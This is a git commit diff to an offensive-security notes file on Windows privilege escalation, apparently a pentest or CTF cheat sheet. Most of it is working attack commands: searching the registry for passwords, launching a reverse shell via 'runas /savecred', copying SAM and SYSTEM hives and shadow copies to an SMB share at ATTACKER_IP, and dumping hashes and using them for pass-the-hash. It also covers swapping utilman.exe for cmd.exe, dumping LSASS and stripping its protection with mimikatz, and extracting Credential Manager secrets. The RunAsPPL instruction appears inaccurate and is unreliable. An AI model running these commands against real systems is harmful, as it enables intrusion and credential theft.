added priv esc for windows

2022-09-01 23:52:46 +02:00 · 2022-09-01 23:52:46 +02:00 · 9a18fefd36
parent 62756e0aad
commit 9a18fefd36
1 changed files with 105 additions and 15 deletions
--- a/exploitation/priv_esc/docs/windows/windows_priv_esc.md
+++ b/exploitation/priv_esc/docs/windows/windows_priv_esc.md
@ -1,6 +1,7 @@
 # Windows Privilege Escalation

 ## Links
+
 * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
 * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
 * [JAWS](https://github.com/411Hall/JAWS)
@ -17,9 +18,11 @@
 * __System__, local system, final escalation
 * __Local Service__, got anonymous connections over network.
 * __Network Service__, default service account, authentication via network
+
 ## Enumeration

 ### Users & Groups
+
 ```sh
 whoami /priv
 net users
@ -35,6 +38,7 @@ qwinsta
 * [powershell](../../../../enumeration/windows/powershell.md)

 ### System
+
 ```sh
 hostname
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
@ -48,15 +52,42 @@ wmic product get name,version,vendor
 wmic service list brief | findstr  "Running"
 ```

+### Logfiles and Registry
+
+```sh
+cmdkey /list
+```
+* Keys containing passwords
+```
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+```
+
+### AD Credentials
+
+* Check AD's NTDS, SYSVOL
+* Check user description of AD users
+```sh
+Get-ADUser -Filter * -Properties * | select Name,SamAccountName,Description
+```
+
 ## Exploit

+* __Use found credentials__
+```sh
+runas /savecred /user:<domain\user> reverse_shell.exe
+```
+
 ### DLL Hijacking
+
 * [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)

 ### Unquoted Service Path
+
 * [unquoted service path](../../../../exploit/windows/docs/unquoted_path.md)

 ### Token Impersonation
+
 * `SeImpersonatePrivilege` is necessary, check via `whoami priv`
 *  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
 * [Potatos](../../../../exploit/windows/docs/potatoes.md)
@ -71,19 +102,6 @@ wmic service list brief | findstr  "Running"

 * [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)

-### Search for Credentials
-```sh
-cmdkey /list
-```
-* Use found credentials
-```sh
-runas /savecred /user:<user> reverse_shell.exe
-```
-* Keys containing passwords
-```
-reg query HKLM /f password /t REG_SZ /s
-reg query HKCU /f password /t REG_SZ /s
-```

 ### accesschk64 Permissions
 * Check access to files and folders
@ -98,6 +116,7 @@ accesschk64 -wvu "file.exe"
 * Any other binary works as well. Copy the compiled portable executable from the `service_escalation` onto the binary path.Restart the service afterwards.

 #### accesschk64 for Services
+
 ```sh
 accesschk64 -qlc "service.exe"
 ```
@ -113,9 +132,11 @@ sc start TheService
 ```

 ### Startup Application
+
 * Put reverse shell instead of an executable inside `C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup`  

 ### Password Mining
+
 * Set up metasploit
 ```sh
 use auxiliary/server/capture/http_basic
@ -235,27 +256,39 @@ icacls C:\Path/to/service.exe /grant Everyone:F
 * `whoami /priv`

 #### SeBackup / Restore
+
 * If `SeBackup / SeRestore` (rw on all files) is set an elevated `cmd.exe` may be opened
 * Download `SAM` and `System` hashes
 ```sh
 reg save hklm\system C:\Windows\Temp\system.hive
 reg save hklm\sam    C:\Windows\Temp\sam.hive
 ```
+* or
+```sh
+copy C:\Windows\System32\config\sam \\ATTACKER_IP\
+```
 * Start smb server on attack machine
 ```sh
 copy C:\Windows\Temp\sam.hive \\ATTACKER_IP\
 copy C:\Windows\Temp\system.hive \\ATTACKER_IP\
 ```
+
 * Dump the hashes
 ```sh
 secretsdump.py -sam sam.hive -system system.hive LOCAL
 ```
+* or meterpreter on target
+```sh
+hashdump
+```
+
 * Use pass the hash to login 
 ```sh
 psexec.py -hashes <hash> administrator@$TARGET_IP
 ```

 #### SeTakeOwnership
+
 * If `SeTakeOwnership` is set one can take ownership of every file or service.
 ```sh
 takeown /f C:\Windows\System32\Utilman.exe
@ -264,9 +297,7 @@ copy cmd.exe utilman.exe
 ```
 * Log out, on the Login screen click on `Ease of Access`

-
 #### SeImpersonate / SeAssignPrimaryToken
-
 * It is a rouge potato
 * Execute process as another user
 * Service accounts operate through impersonation
@ -277,3 +308,62 @@ socat tcp-listen:135 reuseaddr,fork tcp:$TARGET_IP:1234
 ```
 * Catch the potatoe executable from target via netcat

+
+### Volume Shadow Copy Service
+
+* Take a look at the volumes at
+```sh
+vssadmin list shadows
+```
+
+* Copy `sam` and `system` from the shadow copy
+```sh
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam \\ATTACKER_IP\
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system \\ATTACKER_IP\
+```
+
+### Dump LSASS
+
+* If administrator permissions are gained, a dump file can be created by opening the task manager and right clicking `lsass.exe` -> `creat dumpfile`
+* Use `procdump.exe` from sysinternal suite as an alternative to `tskmgr.exe`
+
+* Extract the dump via mimikatz
+```sh
+privilege::debug
+sekurlsa::logonpasswords
+```
+
+### LSASS Protection
+
+* If the dump cannot be created because it is protected change `RunAsPPL` DWORD to `1` under
+```sh
+HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
+```
+
+* Alternatively use mimikatz
+```sh
+!+
+!processprotect /process:lsass.exe /remove
+```
+
+### Windows Credential Manager
+
+* Can be found via `Control Pane` -> `User Accounts` -> `Credential Manager`
+* Alternatively, command line can be used
+```sh
+vaultcmd /list
+vaultcmd /listproperties:"Web Credentials"
+vaultcmd /listcreds:"web credentials"
+```
+
+* Extract the password via powershell script [Get-WebCredentials from nishang](https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1)
+```sh
+powershell -ex bypass
+Get-WebCredentials
+```
+
+* Via mimikatz if administrative permissions have been gained
+```sh
+privilege::debug
+sekurlsa::credman
+```